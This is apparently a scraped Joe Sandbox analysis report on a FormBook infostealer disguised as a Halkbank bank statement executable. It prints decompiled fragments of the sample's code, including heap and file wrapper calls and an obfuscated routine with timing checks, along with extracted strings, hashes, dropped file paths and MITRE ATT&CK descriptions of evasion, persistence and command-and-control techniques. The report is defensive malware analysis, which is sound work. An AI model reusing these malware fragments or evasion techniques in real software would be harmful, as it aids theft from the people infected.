Function 00418710 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041868A Relevance: 1.5, APIs: 1, Instructions: 13
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0b65088b34c48a58451c68d77a51bba9474d0887ad5425d4b0cd8f6310e87f2c
Instruction ID: e4289dff5fc15b8cb82ddd7762612194e960a758efb95b178573bba6994d2f4a
Opcode Fuzzy Hash: 0b65088b34c48a58451c68d77a51bba9474d0887ad5425d4b0cd8f6310e87f2c
Instruction Fuzzy Hash: F6C09BF22081047F9648DAD8BC44CF673FDDBCC751710865EF54DC7100C53564515724

Uniqueness

Uniqueness Score: -1.00%

Function 004188B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188c7
0x004188d2
0x004188dd
0x004188e1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD

Strings

65A, xrefs: 004188D2, 004188DC

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 004188F0 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ff
0x00418907
0x0041891d
0x00418921

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004157D7 Relevance: 6.4, Strings: 5, Instructions: 123COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 004158AD, 004158B0
er-A, xrefs: 00415890
: , xrefs: 0041589E
Us, xrefs: 00415889
gent, xrefs: 00415897

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID:
String ID: Us$: $er-A$gent$urlmon.dll
API String ID: 0-1367105278
Opcode ID: 7184226fc601d755ab0ec0ea5b83f331fa44b303239d85eba7f9512e35ed93bf
Instruction ID: 0a3b1e8f8eade56d28e0ce9027e4914638f82bed3f89e8bb1274d948fdbe4908
Opcode Fuzzy Hash: 7184226fc601d755ab0ec0ea5b83f331fa44b303239d85eba7f9512e35ed93bf
Instruction Fuzzy Hash: C231CDB3D056569ADB01AF61CC427EEFF74EF41314F08029EE494AB2C2D2259A42C7DA

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004088D0(void* __edi, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0;
				_t24 = E00406E20(_t52,  &_v24);
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030(0,  &_v840, __edi,  &_v24,  &_v840);
					_t55 = _t54 + 8;
					_push(__edi);
					do {
						E0041A100( &_v284, 0x104);
						E0041A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24);
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088db
0x004088e3
0x004088e5
0x004088ea
0x004088ef
0x00408902
0x00408907
0x0040890a
0x00408910
0x0040891c
0x0040892f
0x00408934
0x00408937
0x00408940
0x00408952
0x00408957
0x0040895c
0x00000000
0x00000000
0x0040895e
0x00408962
0x00000000
0x00000000
0x00408964
0x00000000
0x00408962
0x00408966
0x00408969
0x0040896f
0x00408971
0x0040897c
0x00408981
0x00408984
0x00408991
0x0040899c
0x0040899e
0x004089a4
0x004089a8
0x004089ab
0x004089ab
0x004089b2
0x004089b5
0x004089ba
0x004089c7
0x004088f6
0x004088f6
0x004088f6

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1efa2f8376c553138144e7bf52808227de5cb7bb2b62794fcf5c230629b4f76a
Instruction ID: 9418915e7eeb477e5e2ec2766e2aaec59ae9dbf4e141e057a09900a59a4d4d67
Opcode Fuzzy Hash: 1efa2f8376c553138144e7bf52808227de5cb7bb2b62794fcf5c230629b4f76a
Instruction Fuzzy Hash: 8321FBB2C4420957CB15E6649E42BFF737C9B50304F04057FE989A3181FA39AB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 0041567B Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0041567B(void* __ebx) {

				asm("enter 0x1387, 0xeb");
				asm("bound edx, [edi-0x28903f56]");
				return 0x6a9cfe15;
			}

0x0041567b
0x00415686
0x00415696

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5906fb2609e8ae7d8c3a6b18260ad703b2d6f7e248f1c53b384b1d1087dc68cf
Instruction ID: 324ff81b3202e575073fe9fc1595e3bee94edd67c35de53f58edefaa33ea2bf7
Opcode Fuzzy Hash: 5906fb2609e8ae7d8c3a6b18260ad703b2d6f7e248f1c53b384b1d1087dc68cf
Instruction Fuzzy Hash: ECC08C23A0E3040651008C4DF880570F3258283026A0433AAD908A3A008A12D024419E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Halkbank_Ekstre_20220128_081138_756957 (1).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Halkbank_Ekstre_20220128_081138_756957 (1).exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_425bqlqm.lt5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhlga21j.a31.psm1

C:\Users\user\AppData\Local\verify.exe

C:\Users\user\AppData\Local\verify.exe:Zone.Identifier

C:\Users\user\Documents\20220128\PowerShell_transcript.210979.n+7rO7_o.20220128221324.txt

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
Halkbank_Ekstre_20220128_081138_756957 (1).exe